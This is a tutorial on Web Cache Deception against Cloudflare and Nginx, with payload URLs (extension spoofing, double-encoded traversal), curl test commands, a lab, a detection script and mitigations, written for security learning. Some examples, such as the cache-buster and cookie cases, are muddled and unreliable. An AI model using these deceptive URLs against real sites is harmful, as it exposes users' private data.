Introduction
Web Cache Deception (WCD) is an attack technique that tricks a caching layer-often a CDN or reverse proxy-into storing and serving sensitive resources (HTML pages, JSON APIs, or credentials) as if they were public static assets. By manipulating the request URL, extensions, or headers, an attacker can cause the cache to serve private data to anyone who later requests the same deceptive URL.
Why it matters: A successful WCD can bypass authentication, leak internal configuration, or expose private API responses. Because CDNs such as Cloudflare sit at the edge of the network, the impact can be global, turning a single mis-configuration into a mass data-leak.
Real-world relevance: Security researchers have demonstrated WCD against major platforms, and bug bounty programs now list it as a high-severity issue. Understanding how the cache key is built, how normalization works, and how extensions are interpreted is essential for any web-security professional.
Prerequisites
- Solid grasp of HTTP caching fundamentals (Cache-Control, ETag, Vary, etc.).
- Familiarity with Nginx configuration syntax and basic server administration on Linux.
- Access to a Cloudflare-protected domain (free tier works) and the ability to modify DNS records.
- Command-line tools:
curl,wget,dig, and a modern browser with dev-tools.
Core Concepts
Before diving into the lab, review the three pillars of cache deception:
- Cache key construction - The combination of scheme, host, path, query string, and selected request headers that uniquely identifies a cached entry.
- Normalization & extension handling - How the caching layer rewrites or sanitizes URLs (removing duplicate slashes, decoding %20, stripping extensions).
- Response classification - Whether the backend marks a response as cache-able (
Cache-Control: public) or private, and whether the CDN respects that classification.
Diagram (described):
- Client → (HTTPS) → Cloudflare Edge Node → (HTTP) → Nginx Origin.
- Cloudflare builds a cache key:
scheme://host + normalized-path + sorted-query + selected-Vary headers. - If the key collides with a previous request for a private page, the private response may be cached and served to the next requester.
Cache key construction and normalization
Both Nginx and Cloudflare construct the cache key from the request line, but they differ in how they treat certain characters:
- Path normalization: duplicate slashes (
//), dot-segments (/./,/../), and percent-encoding are collapsed. - Extension stripping: Many CDNs treat
.css,.js,.pngas static, and may ignore the rest of the URI after the final dot if the extension matches a known static type. - Query string handling: By default Cloudflare includes the full query string in the key, but you can configure
Cache-Keyto ignore it. - Vary header influence: If the origin sends
Vary: Accept-Encoding, Cookie, Cloudflare adds those header values to the key.
Example Nginx cache-key snippet (escaped for clarity):
proxy_cache_key "$scheme://$host$request_uri";
Note the use of $request_uri which already contains the normalized path and query string.
Path-confusion and extension spoofing
Path-confusion attacks rely on the fact that many caches treat the part after the last dot as an indicator of content type, regardless of the actual response body. By appending a harmless static extension to a private URL, the attacker convinces the cache that the response is static.
Typical payloads:
/admin/config.json→/admin/config.json.css/api/secret?token=abc→/api/secret?token=abc.css/private/data→/private/data/.well-known/..%2F..%2F..%2F/private/data(double-encoding trick)
When the origin returns Content-Type: application/json but the URL ends with .css, Cloudflare still stores it under a static key. Subsequent requests for /admin/config.json.css receive the JSON payload.
Static resource impersonation
Many applications serve both static assets (images, CSS) and dynamic pages from the same host. If the caching layer cannot differentiate them correctly, a private HTML page can be cached as if it were a CSS file.
Example scenario:
curl -I https://example.com/dashboard
# HTTP/1.1 200 OK
# Content-Type: text/html
# Cache-Control: private, max-age=0
curl -I https://example.com/dashboard.css
# HTTP/1.1 200 OK (served from cache)
# Content-Type: text/css
# X-Cache-Status: HIT
Because the second request ends with .css, the CDN classifies it as static and stores the HTML response under the .css key. Any user requesting /dashboard.css now receives the private dashboard HTML.
Host header and Vary header abuse on CDNs
CDNs often use the Host header as part of the cache key. If the origin varies responses based on Host (multi-tenant setups) but does not include Vary: Host, the CDN can mistakenly serve data belonging to a different virtual host.
Similarly, abusing Vary on cookies or custom headers can create unintended cache collisions. Example:
curl -H "Cookie: session=alice" https://example.com/profile
# Returns Alice's profile (private)
curl -H "Cookie: session=bob" https://example.com/profile.css
# Cloudflare treats .css as static and ignores Cookie Vary → Bob receives Alice's data
Mitigation: Always include Vary: Cookie when the response depends on authentication cookies, or configure the CDN to ignore cookies for static assets.
Bypassing cache rules with query parameters and cookies
Most CDNs consider the full query string when generating the cache key, but many developers deliberately strip it for static resources to improve cache hit-rate. Attackers can exploit this by appending a harmless query parameter that does not affect the backend logic, yet forces the CDN to treat the request as unique.
Example bypass:
curl -I "https://example.com/secret.docx?cachebuster=123"
# If the origin sends Cache-Control: private, the CDN will still store it because the query string is part of the key.
Conversely, if the CDN is configured to ignore query strings for .css files, an attacker can drop the query entirely, causing the private response to be cached under the generic static key.
Step-by-step lab: crafting deceptive URLs, configuring Nginx, testing against Cloudflare
This lab walks you through a complete WCD exploitation cycle.
- Setup a test domain (e.g.,
lab.example.com) and point it to a Cloudflare-proxied IP. - Deploy a minimal Nginx origin that serves a private HTML page at
/private/secretand a static CSS file at/static/style.css. - Configure Nginx to send
Cache-Control: privatefor the secret page andpublicfor the CSS. - Create deceptive URLs by appending
.cssto the secret path. - Flush the Cloudflare cache (via API or dashboard) to ensure a clean start.
- Trigger the cache with
curland verify theX-Cache-Statusheader. - Validate leakage by requesting the deceptive URL from a different client.
Full Nginx config (escaped):
server { listen 80; server_name lab.example.com; # Private endpoint - never cache location = /private/secret { add_header Cache-Control "private, max-age=0"; return 200 "<html><body>Sensitive data for Alice</body></html>"; } # Public static asset location /static/ { root /usr/share/nginx/html; add_header Cache-Control "public, max-age=86400"; } # Fallback - 404 location / { return 404; }
}
Testing steps (bash):
# 1. Warm up the cache with the legitimate static file
curl -I https://lab.example.com/static/style.css
# 2. Request the secret page with a deceptive .css extension
curl -i https://lab.example.com/private/secret.css
# Expected: 200 OK, Content-Type: text/html, X-Cache-Status: MISS (first time)
# 3. Request the same URL from another client (no auth)
curl -i https://lab.example.com/private/secret.css
# Expected: 200 OK, X-Cache-Status: HIT - secret HTML is now publicly cached
When using Cloudflare, you will see the CF-Cache-Status header instead of X-Cache-Status. The same logic applies.
Detecting successful deception with curl/wget and browser dev tools
Key indicators:
CF-Cache-Status: HIT(orX-Cache-Status: HIT) on a request that should be private.- Mismatched
Content-Type(e.g.,text/cssheader but HTML body). - Presence of authentication cookies in the request but not reflected in the
Varyheader.
Example curl detection script:
#!/usr/bin/env bash
URL=$1
RESPONSE=$(curl -s -D - "$URL" -o /dev/null)
if echo "$RESPONSE" | grep -iq "CF-Cache-Status: HIT"; then echo "[!] Cache HIT detected - possible deception!" echo "$RESPONSE" | grep -i "content-type"
else echo "[-] No cache hit - likely safe."
fi
In Chrome dev tools, look at the Network tab, select the request, and inspect the Response Headers. Cloudflare adds CF-Cache-Status. A value of HIT combined with a private Cache-Control header is a red flag.
Tools & Commands
curl- fetch headers, manipulateHost,Cookie, and query strings.wget- similar tocurlbut useful for recursive fetches.dig- verify DNS points to Cloudflare.- Cloudflare API -
curl -X POST " ...to flush caches. - Burp Suite / OWASP ZAP - intercept and replay requests with altered extensions.
- ngrep or tcpdump - observe raw HTTP traffic between client and edge.
Defense & Mitigation
- Strict Cache-Control: Use
Cache-Control: private, no-storefor any endpoint that depends on authentication. - Vary on Authorization: Include
Vary: Authorization, Cookiewhen responses differ per user. - Normalize URLs at the edge: Configure Cloudflare Workers or Page Rules to reject requests where the extension does not match the
Content-Typeof the response. - Extension whitelist: Serve static assets from a dedicated sub-domain (e.g.,
static.example.com) that never returns private data. - Header sanitization: Strip potentially confusing query parameters before caching (Cloudflare
Cache-Keytransformation). - Security testing: Include WCD checks in your CI pipeline using the detection script above.
Common Mistakes
- Assuming
Cache-Control: privatealone prevents caching - CDNs may ignore it if the URL looks static. - Relying on file extensions to infer content type - attackers can append a benign extension to any path.
- Not adding
Vary: Cookiewhen responses depend on session cookies. - Flushing the CDN cache but forgetting to purge the edge-node cache (Cloudflare’s “Purge Everything” vs. “Purge by URL”).
- Testing only with a browser - many browsers automatically strip unknown extensions; use
curlfor raw behavior.
Real-World Impact
Enterprises that host mixed static/dynamic content on the same host are prime targets. A successful WCD can expose:
- Internal API keys returned in JSON payloads.
- User-specific dashboards leaking personal data.
- Configuration files (
.env,config.yaml) if served via a mis-configured route.
Case study (hypothetical): A SaaS provider used Cloudflare to accelerate its UI. The /account/settings page returned JSON with API tokens and was protected by a session cookie. By requesting /account/settings.json.css, an attacker caused Cloudflare to cache the JSON as a CSS asset. Within minutes, the token was discoverable by anyone who accessed the CSS URL, leading to a full account takeover.
My expert opinion: As CDNs add more aggressive edge-caching heuristics, the attack surface widens. Organizations must treat caching as a security layer, not just a performance optimization.
Practice Exercises
- Deploy the lab environment described above on a VPS and a free Cloudflare account. Verify that the secret page is not cached initially.
- Craft three deceptive URLs using different techniques (extension spoofing, double-encoding, query-string addition). Document which ones result in a cache HIT.
- Modify the Nginx configuration to add
Vary: Cookie. Re-run the exercises and note the change in behavior. - Write a small Cloudflare Worker that rejects any request where the URL extension does not match the
Content-Typeheader. Deploy and test. - Integrate the detection Bash script into a CI job that scans your production URLs daily and alerts on unexpected cache hits.
Further Reading
- RFC 7234 - Hypertext Transfer Protocol (HTTP/1.1): Caching
- Cloudflare Docs: Cache-Control and Cache-Key
- PortSwigger Web Cache Deception write-up (2023)
- OWASP Testing Guide - Testing for Improper Cache Configuration (OTG-CACH-001)
- “Cache Poisoning and Deception” - Black Hat Europe 2022 presentation slides
Summary
Web Cache Deception exploits the way CDNs and reverse proxies build cache keys. By manipulating URL paths, extensions, and headers, attackers can force private responses into public caches. This guide covered the underlying cache-key mechanics, common deception techniques, a hands-on lab with Nginx and Cloudflare, detection methods, and mitigation best practices. Mastering these concepts equips security professionals to audit, harden, and monitor modern edge-caching deployments.